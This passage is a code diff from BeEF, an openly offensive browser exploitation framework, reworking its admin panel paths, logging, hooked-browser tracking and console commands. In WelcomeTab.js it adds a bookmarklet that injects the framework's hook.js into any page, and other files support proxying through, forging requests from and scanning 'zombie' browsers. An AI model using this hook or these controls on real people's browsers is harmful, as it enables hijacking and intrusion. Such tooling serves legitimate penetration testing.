     });
 
     this.bbar = new Ext.PagingToolbar({
@@ -35,16 +35,17 @@ DataGrid = function(url, page, base) {
     this.columns = [{
 			id: 'log-id',
 			header: 'Id',
-			hidden: true,
+			hidden: false,
 			dataIndex: 'id',
-			sortable: false
+			sortable: true,
+			width: 20
 		}, {
 			id: 'log-type',
 			header: "Type",
 			dataIndex: 'type',
 			sortable: true,
 			width: 60,
-			renderer: function(value, metaData, record, rowIndex, colIndex, store) {
+			renderer: function(value) {
 				return "<b>" + $jEncoder.encoder.encodeForHTML(value) + "</b>";
 			}
 		}, {
@@ -53,7 +54,9 @@ DataGrid = function(url, page, base) {
 			dataIndex: 'event',
 			sortable:true,
 			width: 420,
-			renderer: $jEncoder.encoder.encodeForHTML(this.formatTitle)
+			renderer: function(value){
+                return $jEncoder.encoder.encodeForHTML(value);
+            }
 		}, {
 			id: 'log-date',
 			header: "Date",
@@ -61,6 +64,12 @@ DataGrid = function(url, page, base) {
 			width: 80,
 			renderer:  $jEncoder.encoder.encodeForHTML(this.formatDate),
 			sortable:true
+		}, {
+			id: 'log-browser',
+			header: "Browser ID",
+			dataIndex: 'hooked_browser_id',
+			sortable: true,
+			width: 35
     }];
 
     DataGrid.superclass.constructor.call(this, {
@@ -78,7 +87,7 @@ DataGrid = function(url, page, base) {
 		
 		listeners: {
 			afterrender: function(datagrid) {
-				datagrid.store.reload({params:{start:0, limit:datagrid.page, sort:"date", dir:"DESC"}});
+				datagrid.store.reload({params:{start:0, limit:datagrid.page, sort:"id", dir:"DESC"}});
 			}
 		}
     });

extensions/admin_ui/media/javascript/ui/panel/Logout.js

@@ -10,12 +10,12 @@ DoLogout = function() {
 	
 	after_logout = function() {
 		// will redirect the UA to the login
-		window.location.href = '/ui/panel'		
+		window.location.href = '<%= @base_path %>/panel'
 	}
 	
 	button.on('click', function(){
 		Ext.Ajax.request({
-			url: '/ui/authentication/logout',
+			url: '<%= @base_path %>/authentication/logout',
 			method: 'POST',
 		    params: 'nonce=' + Ext.get("nonce").dom.value,
 			success: after_logout,

extensions/admin_ui/media/javascript/ui/panel/MainPanel.js

@@ -29,7 +29,7 @@ MainPanel = function(){
         }
     });
 
-    this.grid = new DataGrid('/ui/logs/all.json',30);
+    this.grid = new DataGrid('<%= @base_path %>/logs/all.json',30);
 	this.grid.border = false;
     this.welcome_tab = new WelcomeTab;
 	//this.hooks_tab = new HooksTab;

extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js

@@ -42,19 +42,39 @@ Ext.onReady(function() {
  * This event updater retrieves updates every 8 seconds. Those updates
  * are then pushed to various managers (i.e. the zombie manager).
  */
+var lastpoll = new Date().getTime();
+
 Ext.TaskMgr.start({
 	run: function() {
 		Ext.Ajax.request({
-			url: '/ui/panel/hooked-browser-tree-update.json',
+			url: '<%= @base_path %>/panel/hooked-browser-tree-update.json',
 			method: 'POST',
 			success: function(response) {
-				var updates = Ext.util.JSON.decode(response.responseText);
+				var updates;
+				try {
+					updates = Ext.util.JSON.decode(response.responseText);
+				} catch (e) {
+					//The framework has probably been reset and you're actually logged out
+					var hr = document.getElementById("header-right");
+					hr.innerHTML = "You appear to be logged out. <a href='<%= @base_path %>/panel/'>Login</a>";
+				}
 				var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
 				var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;
 				
 				if(zombiesManager && hooked_browsers) {
 					zombiesManager.updateZombies(hooked_browsers, distributed_engine_rules);
 				}
+				lastpoll = new Date().getTime();
+				var hr = document.getElementById("header-right");
+				hr.innerHTML = "";
+			},
+			failure: function(response) {
+				var timenow = new Date().getTime();
+
+				if ((timenow - lastpoll) > 60000) {
+					var hr = document.getElementById("header-right");
+					hr.innerHTML = "Framework is down";
+				}
 			}
 		});
 	},

extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js

@@ -6,13 +6,18 @@
 
 WelcomeTab = function() {
 
+    var hookURL = location.protocol+'%2f%2f'+location.hostname+(location.port ? ':'+location.port : '')+'%2fhook.js';
+    var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27__HOOKURL__%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"
+    bookmarklet = bookmarklet.replace(/__HOOKURL__/,hookURL);
+
     welcome = " \
               <div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
-              <p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
+              <p><img src='<%= @base_path %>/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
               <p>Official website: <a href='http://beefproject.com/'>http://beefproject.com/</a></p><br />\
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
               <p>Welcome to BeEF!</p><br /> \
               <p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \
+              <p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's bookmark bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
               <p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\
               <p>To interact with a hooked browser simply left-click it, a new tab will appear. \
@@ -46,7 +51,9 @@ WelcomeTab = function() {
               </div>\
               ";
 
-    WelcomeTab.superclass.constructor.call(this, {
+  welcome = welcome.replace(/__BOOKMARKLETURL__/,bookmarklet);
+
+  WelcomeTab.superclass.constructor.call(this, {
 	region:'center',
 	padding:'10 10 10 10',
 	html: welcome,

extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js

@@ -26,17 +26,18 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_flash          = zombie_array[index]["has_flash"];
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
-		var has_java           = zombie_array[index]["has_java"];
+		var has_webrtc         = zombie_array[index]["has_webrtc"];
 		var has_activex        = zombie_array[index]["has_activex"];
-		var has_vlc            = zombie_array[index]["has_vlc"];
+		var has_wmp            = zombie_array[index]["has_wmp"]; 
+		var has_foxit          = zombie_array[index]["has_foxit"];
 		var has_silverlight    = zombie_array[index]["has_silverlight"];
 		var has_quicktime      = zombie_array[index]["has_quicktime"];
 		var has_realplayer     = zombie_array[index]["has_realplayer"];
 		var date_stamp         = zombie_array[index]["date_stamp"];
 
-		text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
-		text+= "<img src='/ui/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
-		text+= "<img src='/ui/media/images/icons/"+escape(hw_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
+		text = "<img src='<%= @base_path %>/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
+		text+= "<img src='<%= @base_path %>/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
+		text+= "<img src='<%= @base_path %>/media/images/icons/"+escape(hw_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
 		text+= ip;
 
 		balloon_text = "IP: "                  + ip;
@@ -45,12 +46,13 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Hardware: "       + hw_name;
 		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
 		balloon_text+= "<br/>Flash: "          + has_flash;
-                balloon_text+= "<br/>Java: "           + has_java;
-                balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>WebRTC: "         + has_webrtc;
 		balloon_text+= "<br/>ActiveX: "        + has_activex;
 		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
 		balloon_text+= "<br/>QuickTime: "      + has_quicktime;
-                balloon_text+= "<br/>VLC: "            + has_vlc;
+		balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; 
+		balloon_text+= "<br/>Foxit: "          + has_foxit;
 		balloon_text+= "<br/>RealPlayer: "     + has_realplayer;
 		balloon_text+= "<br/>Google Gears: "   + has_googlegears;
 		balloon_text+= "<br/>Date: "           + date_stamp;
@@ -63,7 +65,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 			'balloon_text' : balloon_text,
 			'check'        : false,
 			'domain'       : domain,
-            'port'         : port
+			'port'         : port
 		};
 
 		return new_zombie;

extensions/admin_ui/media/javascript/ui/panel/common.js

@@ -111,7 +111,7 @@ function get_dynamic_payload_details(payload, zombie) {
 	modid = Ext.getCmp( 'form-zombie-'+zombie.session+'-field-mod_id').value
 	Ext.Ajax.request({
 		loadMask: true,
-		url: '/ui/modules/select/commandmodule.json',
+		url: '/<%= @base_path %>/modules/select/commandmodule.json',
 		method: 'POST',
 		params: 'command_module_id=' + modid  + '&' + 'payload_name=' + payload,
 		success: function(resp) {
@@ -146,7 +146,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 	panel.removeAll();
 	
 	Ext.Ajax.request({
-		url: '/ui/modules/select/command.json',
+		url: '<%= @base_path %>/modules/select/command.json',
 		method: 'POST',
 		params: 'command_id=' + command_id,
 		loadMask: true,
@@ -159,7 +159,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 			}
 			
 			var form = new Ext.form.FormPanel({
-				url: '/ui/modules/commandmodule/reexecute',
+				url: '<%= @base_path %>/modules/commandmodule/reexecute',
 				id: 'form-command-module-zombie-'+zombie.session,
 				border: false,
 				labelWidth: 75,
@@ -208,7 +208,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 			});
 			
 			var grid_store = new Ext.data.JsonStore({
-				url: '/ui/modules/select/command_results.json?command_id='+command_id,
+				url: '<%= @base_path %>/modules/select/command_results.json?command_id='+command_id,
 				storeId: 'command-results-store-zombie-'+zombie.session,
 		        root: 'results',
 				remoteSort: false,
@@ -241,7 +241,8 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 				viewConfig: {
 					forceFit:true
 				},
-				
+
+			// render command responses
 		        columns:[new Ext.grid.RowNumberer({width: 20}), {
 			            dataIndex: 'date',
 			            sortable: false,
@@ -250,11 +251,29 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 							html += '<p>';
 							for(index in record.data.data) {
 								result = record.data.data[index];
-								index = index.toString().replace('_', ' ');
-                                //output escape everything, but allow the <br> tag for better rendering.
-								html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
+								index  = index.toString().replace('_', ' ');
+
+								// Check for a base64 encoded image
+								var header = "image=data:image/(jpg|png);base64,";
+								var re = new RegExp(header, "");
+								if (result.match(re)) {
+
+									// Render the image
+									try {
+										var img = result.replace(/[\r\n]/g, '');
+										base64_data = window.atob(img.replace(re, ''));
+										html += String.format('<img src="{0}" /><br>', img.replace(/^image=/, ''));
+									} catch(e) {
+										console.log("Received invalid base64 encoded image string: "+e.toString());
+										html += String.format('<b>{0}</b>: {1}<br>', index, result);
+									}
+
+								// output escape everything else, but allow the <br> tag for better rendering.
+								} else {
+									html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
+								}
 							}
-							
+
 							html += '</p>';
 							return html;
 						}
@@ -301,7 +320,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
 	} else {
 		Ext.Ajax.request({
 			loadMask: true,
-			url: '/ui/modules/select/commandmodule.json',
+			url: '<%= @base_path %>/modules/select/commandmodule.json',
 			method: 'POST',
 			params: 'command_module_id=' + command_module_id,
 			success: function(resp) {
@@ -312,9 +331,9 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
 					return;
 				}
 
-				var submiturl = '/ui/modules/commandmodule/new';
+				var submiturl = '<%= @base_path %>/modules/commandmodule/new';
 				if(module.dynamic){
-					submiturl = '/ui/modules/commandmodule/dynamicnew';
+					submiturl = '<%= @base_path %>/modules/commandmodule/dynamicnew';
 				}
 				
 				module = module.command_modules[1];

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js

@@ -248,7 +248,7 @@ ZombieTab_Autorun = function(zombie) {
                 }
          }})],
          loader: new Ext.tree.TreeLoader({
-                dataUrl: '/ui/modules/select/commandmodules/tree.json',
+                dataUrl: '<%= @base_path %>/modules/select/commandmodules/tree.json',
                 baseParams: {zombie_session: zombie.session},
                 createNode: function(attr) {
                 if(attr.checked == null){attr.checked = false;}

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js

@@ -19,7 +19,7 @@ ZombieTab_Commands = function(zombie) {
 
 	var command_module_grid = new Ext.grid.GridPanel({
 		store: new Ext.data.JsonStore({
-				url: '/ui/modules/commandmodule/commands.json',
+				url: '<%= @base_path %>/modules/commandmodule/commands.json',
 				params: {  // insert the nonce with the form
 						nonce: Ext.get ("nonce").dom.value
 				},
@@ -107,7 +107,7 @@ ZombieTab_Commands = function(zombie) {
 		rootVisible: false,
 		root: {nodeType: 'async'},
 		loader: new Ext.tree.TreeLoader({
-          dataUrl: '/ui/modules/select/commandmodules/tree.json',
+          dataUrl: '<%= @base_path %>/modules/select/commandmodules/tree.json',
           baseParams: {zombie_session: zombie.session},
           listeners:{
             beforeload: function(treeloader, node, callback) {

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js

@@ -10,7 +10,7 @@
 ZombieTab_DetailsTab = function(zombie) {
 	
 	var store_summary = new Ext.data.GroupingStore({
-			url: '/ui/modules/select/zombie_summary.json',
+			url: '<%= @base_path %>/modules/select/zombie_summary.json',
 			baseParams: {zombie_session: zombie.session} ,
 			reader: new Ext.data.JsonReader({
 					root: 'results'

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js

@@ -33,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) {
                 id = data.id;
             },
             error: function(){
-                console.log("Error getting module id.");
+                beef.debug("Error getting module id.");
             }
         });
         return id;
@@ -110,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) {
                     async: false,
                     processData: false,
                     success: function(data){
-                        console.log("data: " + data.command_id);
+                        beef.debug("data: " + data.command_id);
                         result = "Command [" + data.command_id + "] sent successfully";
                     },
                     error: function(){
-                        console.log("Error sending command");
+                        beef.debug("Error sending command");
                         return "Error sending command";
                     }
                 });
@@ -142,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) {
                         processData: false,
                         success: function(data){
                             $jwterm.each(data, function(i){
-                                console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
+                                beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
                                 results += $jwterm.parseJSON(data[i].data).data;
                             });
 
                         },
                         error: function(){
-                            console.log("Error sending command");
+                            beef.debug("Error sending command");
                             return "Error sending command";
                         }
                     });

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js

@@ -9,7 +9,7 @@
  */
 ZombieTab_LogTab = function(zombie) {
 
-	var zombieLog = new DataGrid('/ui/logs/zombie.json',30,{session:zombie.session});
+	var zombieLog = new DataGrid('<%= @base_path %>/logs/zombie.json',30,{session:zombie.session});
 	zombieLog.border = false;
 
 	ZombieTab_LogTab.superclass.constructor.call(this, {

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js

@@ -32,7 +32,7 @@ ZombieTab_Requester = function(zombie) {
 		title: 'Proxy',
 		layout: 'fit',
 		padding: '10 10 10 10',
-                html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
+                html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
 		listeners: {
 			activate: function(proxy_panel) {
 				// to do: refresh list of hooked browsers
@@ -56,7 +56,7 @@ ZombieTab_Requester = function(zombie) {
 	 ********************************************/
 	var history_panel_store = new Ext.ux.data.PagingJsonStore({
 		storeId: 'requester-history-store-zombie-'+zombie.session,
-		url: '/ui/requester/history.json',
+		url: '<%= @base_path %>/requester/history.json',
 		remoteSort: false,
 		autoDestroy: true,
 		autoLoad: false,
@@ -169,7 +169,7 @@ ZombieTab_Requester = function(zombie) {
 		
 		listeners: {
 			activate: function(history_panel) {
-				history_panel.items.items[0].store.reload({params:{url:'/ui/requester/history.json'}});
+				history_panel.items.items[0].store.reload({params:{url:'<%= @base_path %>/requester/history.json'}});
 			}
 		}
 	});
@@ -190,7 +190,7 @@ ZombieTab_Requester = function(zombie) {
 		var form = new Ext.FormPanel({
 			title: 'Forge Raw HTTP Request',
 			id: 'requester-request-form-zombie'+zombie.session,
-			url: '/ui/requester/send',
+			url: '<%= @base_path %>/requester/send',
 			hideLabels : true,
 			border: false,
 			padding: '3px 5px 0 5px',
@@ -251,7 +251,7 @@ ZombieTab_Requester = function(zombie) {
 		bar.update_sending('Getting response...');
 		
 		Ext.Ajax.request({
-			url: '/ui/requester/response.json',
+			url: '<%= @base_path %>/requester/response.json',
 			loadMask: true,
 			
 			params: {

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js

@@ -23,7 +23,7 @@ ZombieTab_XssRaysTab = function(zombie) {
 
      var xssrays_logs_store = new Ext.ux.data.PagingJsonStore({
         storeId: 'xssrays-logs-store-zombie-' + zombie.session,
-        url: '/ui/xssrays/zombie.json',
+        url: '/<%= @base_path %>/xssrays/zombie.json',
         remoteSort: false,
         autoDestroy: true,
         autoLoad: false,
@@ -94,7 +94,7 @@ ZombieTab_XssRaysTab = function(zombie) {
 		var form = new Ext.FormPanel({
 			title: 'Scan settings',
 			id: 'xssrays-config-form-zombie'+zombie.session,
-			url: '/ui/xssrays/createNewScan',
+			url: '<%= @base_path %>/xssrays/createNewScan',
             labelWidth: 230,
 			border: false,
 			padding: '3px 5px 0 5px',

extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js

@@ -85,14 +85,14 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
                   switch (item.id) {
                       case 'use_as_proxy':
                            Ext.Ajax.request({
-                                url: '/ui/proxy/setTargetZombie',
+                                url: '<%= @base_path %>/proxy/setTargetZombie',
                                 method: 'POST',
                                 params: 'hb_id=' + escape(hb_id)
                             });
                           break;
                        case 'xssrays_hooked_domain':
                            Ext.Ajax.request({
-                                url: '/ui/xssrays/set_scan_target',
+                                url: '<%= @base_path %>/xssrays/set_scan_target',
                                 method: 'POST',
                                 params: 'hb_id=' + escape(hb_id)
                             });

extensions/admin_ui/media/javascript/wterm/wterm.jquery.js

@@ -422,3 +422,6 @@
   };
 
 })( jQuery );
+
+
+var $jwterm = jQuery.noConflict();

extensions/console/lib/command_dispatcher/command.rb

@@ -10,9 +10,18 @@ module CommandDispatcher
   
 class Command
   include BeEF::Extension::Console::CommandDispatcher
+
+  @@params = []
   
   def initialize(driver)
     super
+    begin 
+      driver.interface.cmd['Data'].each{|data|
+        @@params << data['name']
+      }
+    rescue
+      return
+    end
   end
   
   def commands
@@ -41,12 +50,16 @@ class Command
     }
       
     print_line("Module name: " + driver.interface.cmd['Name'])
-    print_line("Module category: " + driver.interface.cmd['Category'])
+    print_line("Module category: " + driver.interface.cmd['Category'].to_s)
     print_line("Module description: " + driver.interface.cmd['Description'])
     print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0
 
     driver.interface.cmd['Data'].each{|data|
-      print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
+      if data['type'].eql?("combobox")
+        print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'] + " (Options include: " + data['store_data'].to_s + ")")
+      else
+        print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
+      end
     } if not driver.interface.cmd['Data'].nil?
   end
   
@@ -80,6 +93,16 @@ class Command
     print_status("Sets parameters for the current modules. Run \"cmdinfo\" to see the parameter values")
     print_status("  Usage: param <paramname> <paramvalue>")
   end
+
+  def cmd_param_tabs(str,words)
+    return if words.length > 1
+
+    if @@params == ""
+      #nothing prepopulated?
+    else
+      return @@params
+    end
+  end
   
   def cmd_execute(*args)
     @@bare_opts.parse(args) {|opt, idx, val|
@@ -119,6 +142,7 @@ class Command
         ])
 
     if args[0] == nil
+      lastcmdid = nil
       driver.interface.getcommandresponses.each do |resp|
         indiresp = driver.interface.getindividualresponse(resp['object_id'])
         respout = ""
@@ -126,6 +150,7 @@ class Command
           respout = "No response yet"
         else
           respout = Time.at(indiresp[0]['date'].to_i).to_s
+          lastcmdid = resp['object_id']
         end
         tbl << [resp['object_id'].to_s, resp['creationdate'], respout]
       end
@@ -133,6 +158,16 @@ class Command
       puts "\n"
       puts "List of responses for this command module:\n"
       puts tbl.to_s + "\n"
+
+      if not lastcmdid.nil?
+        resp = driver.interface.getindividualresponse(lastcmdid)
+        puts "\n"
+        print_line("The last response [" + lastcmdid.to_s + "] was retrieved: " + Time.at(resp[0]['date'].to_i).to_s)
+        print_line("Response:")
+        resp.each do |op|
+          print_line(op['data']['data'].to_s)
+        end
+      end
     else
       output = driver.interface.getindividualresponse(args[0])
       if output.nil?

extensions/console/lib/command_dispatcher/core.rb

@@ -141,13 +141,14 @@ class Core
         [
           'Id',
           'IP',
+          'Hook Host',
           'Browser',
           'OS',
           'Hardware'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
     end
     
     puts "\n"
@@ -174,12 +175,14 @@ class Core
         [
           'Id',
           'IP',
+          'Hook Host',
           'Browser',
-          'OS'
+          'OS',
+          'Hardware'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
     end
     
     puts "\n"
@@ -283,12 +286,21 @@ class Core
       offlinezombies << zombie.id
     end
     
-    if not offlinezombies.include?(args[0].to_i)
-      print_status("Browser does not appear to be offline..")
-      return false
-    end
+    targets = args[0].split(',')
+    targets.each {|t|
+        if not offlinezombies.include?(t.to_i)
+          print_status("Browser [id:"+t.to_s+"] does not appear to be offline.")
+          return false
+        end
+    #print_status("Adding browser [id:"+t.to_s+"] to target list.")
+    }
+
+    # if not offlinezombies.include?(args[0].to_i)
+    #   print_status("Browser does not appear to be offline..")
+    #   return false
+    # end
     
-    if not driver.interface.setofflinetarget(args[0]).nil?
+    if not driver.interface.setofflinetarget(targets).nil?
       if (driver.dispatcher_stack.size > 1 and
 	      driver.current_dispatcher.name != 'Core')
 	      driver.destack_dispatcher
@@ -299,7 +311,7 @@ class Core
       if driver.interface.targetid.length > 1
         driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
       else
-        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ")
+        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ")
       end
     end  
     
@@ -327,7 +339,12 @@ class Core
         driver.run_single("offline")
       when 'commands'
         if driver.dispatched_enstacked(Target)
+          if args[1] == "-s" and not args[2].nil?
+           driver.run_single("commands #{args[1]} #{args[2]}")
+           return
+         else
           driver.run_single("commands")
+        end
         else
           print_error("You aren't targeting a zombie yet")
         end

extensions/console/lib/command_dispatcher/target.rb

@@ -18,7 +18,7 @@ class Target
     begin
       driver.interface.getcommands.each { |folder|
         folder['children'].each { |command|
-          @@commands << folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+          @@commands << folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
         }
       }
     rescue
@@ -40,17 +40,29 @@ class Target
   
   @@bare_opts = Rex::Parser::Arguments.new(
 	  "-h" => [ false, "Help."              ])
+
+  @@commands_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help."],
+    "-s" => [ false, "<search term>"],
+    "-r" => [ false, "List modules which have responses against them only"])
   
   def cmd_commands(*args)
+
+    searchstring = nil
+    responly = nil
     
-    @@bare_opts.parse(args) {|opt, idx, val|
+    @@commands_opts.parse(args) {|opt, idx, val|
       case opt
         when "-h"
           cmd_commands_help
           return false
+        when "-s"
+          searchstring = args[1].downcase if not args[1].nil?
+        when "-r"
+          responly = true
         end
     }
-    
+
     tbl = Rex::Ui::Text::Table.new(
       'Columns' =>
         [
@@ -63,10 +75,29 @@ class Target
     
     driver.interface.getcommands.each { |folder|
       folder['children'].each { |command|
-        tbl << [command['id'].to_i,
-                folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"),
+
+        cmdstring = folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+
+        if not searchstring.nil?
+          if not cmdstring.downcase.index(searchstring).nil?
+            tbl << [command['id'].to_i,
+                cmdstring,
                 command['status'].gsub(/^Verified /,""),
                 driver.interface.getcommandresponses(command['id']).length] #TODO
+          end
+        elsif not responly.nil?
+             tbl << [command['id'].to_i,
+                cmdstring,
+                command['status'].gsub(/^Verified /,""),
+                driver.interface.getcommandresponses(command['id']).length] if driver.interface.getcommandresponses(command['id']).length.to_i > 0
+
+        else 
+         tbl << [command['id'].to_i,
+            cmdstring,
+            command['status'].gsub(/^Verified /,""),
+            driver.interface.getcommandresponses(command['id']).length] #TODO
+        end
+
       }
     }
     
@@ -78,6 +109,9 @@ class Target
   
   def cmd_commands_help(*args)
     print_status("List command modules for this target")
+    print_line("Usage: commands [options]")
+    print_line
+    print @@commands_opts.usage()
   end
   
   def cmd_info(*args)
@@ -133,7 +167,7 @@ class Target
     else
       driver.interface.getcommands.each { |x|
         x['children'].each { |y|
-          if args[0].chomp == x['text']+"/"+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+          if args[0].chomp == x['text'].gsub(/\s/,"_")+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
             modid = y['id']
           end
         }

extensions/console/lib/shellinterface.rb

